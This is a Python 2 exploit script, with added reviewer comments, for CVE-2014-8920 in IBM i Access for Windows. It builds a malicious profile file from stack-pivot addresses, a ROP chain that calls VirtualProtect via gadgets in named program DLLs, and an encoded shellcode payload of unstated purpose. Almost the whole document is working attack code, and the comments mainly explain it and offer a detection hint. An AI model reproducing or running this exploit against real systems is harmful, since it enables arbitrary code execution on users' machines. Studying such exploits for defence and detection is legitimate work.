IBM i Access for Windows - CVE-2014-8920 - Exploit
import struct | |
# Reported by Fernando Muñoz
# Upstream: http://www-01.ibm.com/support/docview.wss?uid=nas8N1020518
# Author: Marcelo Echeverria
# Tested on Windows XP SP3
# Two absolute return addresses used as stack pivots. Both are written into
# the first bracketed line of the generated profile text (see the print
# statements further down), separated by a run of 'A' filler.
# NOTE(review): hard-coded addresses with no module named here; presumably
# only valid for the exact module build the author tested against.
stack_pivot1 = 0x67bc6661
stack_pivot2 = 0x67bc1967
# Jumps 3 times: pivot1 + pivot2 + pivot1
# Shellcode w32-calc google
# NOTE(review): this assignment is dead code -- `buf` is reset to "" on the
# very next line and rebuilt from the fragments below, so these bytes are
# never emitted. Kept as-is; it is the author's original listing.
buf = "\x31\xd2\x52\x68\x63\x61\x6c\x63\x89\xe6\x52\x56\x64\x8b\x72\x30\x8b\x76\x0c\x8b\x76\x0c\xad\x8b\x30\x8b\x7e\x18\x8b\x5f\x3c\x8b\x5c\x1f\x78\x8b\x74\x1f\x20\x01\xfe\x8b\x4c\x1f\x24\x01\xf9\x0f\xb7\x2c\x51\x42\xad\x81\x3c\x07\x57\x69\x6e\x45\x75\xf1\x8b\x74\x1f\x1c\x01\xfe\x03\x3c\xae\xff\xd7"
# Second payload, built fragment by fragment. Its origin/encoder is not stated
# on the page, so nothing beyond "raw payload bytes" is asserted here.
# These are Python 2 `str` literals: each "\xNN" is one raw byte, and `+=`
# appends bytes. Under Python 3 the same literals are Unicode text, and the
# later concatenation with struct.pack() output (bytes) raises TypeError.
buf = ""
buf += "\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\xa0\xa9\x85\xb6\x83\xee\xfc\xe2\xf4\x5c\x41"
buf += "\x07\xb6\xa0\xa9\xe5\x3f\x45\x98\x45\xd2\x2b\xf9\xb5"
buf += "\x3d\xf2\xa5\x0e\xe4\xb4\x22\xf7\x9e\xaf\x1e\xcf\x90"
buf += "\x91\x56\x29\x8a\xc1\xd5\x87\x9a\x80\x68\x4a\xbb\xa1"
buf += "\x6e\x67\x44\xf2\xfe\x0e\xe4\xb0\x22\xcf\x8a\x2b\xe5"
buf += "\x94\xce\x43\xe1\x84\x67\xf1\x22\xdc\x96\xa1\x7a\x0e"
buf += "\xff\xb8\x4a\xbf\xff\x2b\x9d\x0e\xb7\x76\x98\x7a\x1a"
buf += "\x61\x66\x88\xb7\x67\x91\x65\xc3\x56\xaa\xf8\x4e\x9b"
buf += "\xd4\xa1\xc3\x44\xf1\x0e\xee\x84\xa8\x56\xd0\x2b\xa5"
buf += "\xce\x3d\xf8\xb5\x84\x65\x2b\xad\x0e\xb7\x70\x20\xc1"
buf += "\x92\x84\xf2\xde\xd7\xf9\xf3\xd4\x49\x40\xf6\xda\xec"
buf += "\x2b\xbb\x6e\x3b\xfd\xc1\xb6\x84\xa0\xa9\xed\xc1\xd3"
buf += "\x9b\xda\xe2\xc8\xe5\xf2\x90\xa7\x56\x50\x0e\x30\xa8"
buf += "\x85\xb6\x89\x6d\xd1\xe6\xc8\x80\x05\xdd\xa0\x56\x50"
buf += "\xe6\xf0\xf9\xd5\xf6\xf0\xe9\xd5\xde\x4a\xa6\x5a\x56"
buf += "\x5f\x7c\x12\xdc\xa5\xc1\x45\x1e\xaa\x3d\xed\xb4\xa0"
buf += "\xb8\xd9\x3f\x46\xc3\x95\xe0\xf7\xc1\x1c\x13\xd4\xc8"
buf += "\x7a\x63\x25\x69\xf1\xba\x5f\xe7\x8d\xc3\x4c\xc1\x75"
buf += "\x03\x02\xff\x7a\x63\xc8\xca\xe8\xd2\xa0\x20\x66\xe1"
buf += "\xf7\xfe\xb4\x40\xca\xbb\xdc\xe0\x42\x54\xe3\x71\xe4"
buf += "\x8d\xb9\xb7\xa1\x24\xc1\x92\xb0\x6f\x85\xf2\xf4\xf9"
buf += "\xd3\xe0\xf6\xef\xd3\xf8\xf6\xff\xd6\xe0\xc8\xd0\x49"
buf += "\x89\x26\x56\x50\x3f\x40\xe7\xd3\xf0\x5f\x99\xed\xbe"
buf += "\x27\xb4\xe5\x49\x75\x12\x75\x03\x02\xff\xed\x10\x35"
buf += "\x14\x18\x49\x75\x95\x83\xca\xaa\x29\x7e\x56\xd5\xac"
buf += "\x3e\xf1\xb3\xdb\xea\xdc\xa0\xfa\x7a\x63"
def create_rop_chain():
    """Return the author's ROP chain as one packed Python 2 ``str``.

    The function itself only serialises a fixed list of 32-bit values: each
    entry is packed with ``struct.pack('<I', ...)`` (4-byte unsigned,
    little-endian) and the results are concatenated with ``''.join``.
    The trailing comments on each entry are the author's annotations of what
    the value is (gadget, IAT slot, padding) and which module it came from;
    they are not verified here. Every address is absolute, so the chain is
    presumably tied to the exact module versions the author tested on.

    Returns:
        str (Python 2): the concatenated little-endian dwords, 4 bytes per
        list entry.

    Note:
        On Python 3 ``struct.pack`` returns ``bytes`` and ``''.join`` over
        bytes raises ``TypeError``; this listing assumes Python 2.
    """
    rop_gadgets = [
        0x0041c76d, # POP EAX # RETN [pcsws.exe]
        0x004C11B4, # EAX (IAT OFFSET WaitForMultipleObjects)
        0x67b95848, # MOV EAX,DWORD PTR DS:[EAX] # RETN [LTASWN20.DLL]
        0x67b9b002, # POP ESI # RETN
        0x0000013f, # IAT DEREFERENCING VirtualProtect
        0x66fc4dfb, # ADD EAX,ESI # POP ESI # POP EBP # RETN
        0x41414141, # ESI PAD
        0x41414141, # EBP PAD
        0x66eece8c, # XCHG EAX,ESI # RETN [PCSTLNET.dll]
        0x004b5817, # POP EBP # RETN [pcsws.exe]
        0x67392433, # & call esp [PCSHELP.dll]
        0x67bd8003, # POP EBX # RETN [LTASWN20.DLL]
        0x00000201, # 0x00000201-> ebx
        0x00489a33, # POP EDX # DEC ESI # ADD AL,CH # RETN [pcsws.exe]
        0x00000040, # 0x00000040-> edx
        0x67963018, # POP ECX # RETN [PCSSH.dll]
        0x66d2651d, # &Writable location [PCSWSAPI.dll]
        0x66eecfb9, # POP EDI # RETN [PCSTLNET.dll]
        0x66e79118, # RETN (ROP NOP) [PCSULIB.dll]
        0x0041c76d, # POP EAX # RETN [pcsws.exe]
        0x90909090, # nop
        0x67bb99b2, # PUSHAD # RETN [LTASWN20.DLL]
    ]
    # '_' is used as the loop variable here; it is an ordinary name, not a
    # discard, since it is read inside the pack() call.
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
# Module-level side effect: writes the generated profile text to stdout using
# Python 2 print statements (a SyntaxError under Python 3). Redirecting stdout
# is how the author would have produced a file from this.
rop_chain = create_rop_chain()
# Raw x86 bytes; the variable name says they adjust the stack, but they are
# not decoded or verified here.
adjust_stack = "\x81\xc4\x00\x40\x00\x00\x89\xe5\x81\xc5\x00\x40\x00\x00\x66\x83\xe4\xf8\x66\x83\xe5\xf8"
# INI-style header lines.
print "[Profile]"
print "ID=WS"
print "Version=1"
# First bracketed line: pivot2 (little-endian dword), a run of 'A' filler,
# then pivot1.
print "["+struct.pack('<I',stack_pivot2)+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+struct.pack('<I',stack_pivot1)+"]"
print "a=1"
# Second bracketed line: 35 'M' bytes, the packed ROP chain, 8 x 0x90,
# adjust_stack, 2 x 0x90, the payload in `buf`, and 10 x 0x90.
# Detection note: the output is a text profile whose section lines carry
# non-printable bytes and long runs of repeated 'A' / 'M' / 0x90 characters --
# a useful signature for anyone inspecting such profile files at rest.
print "["+"M"*35+rop_chain+"\x90"*8+adjust_stack+"\x90"*2+buf+"\x90"*10
print "a=1"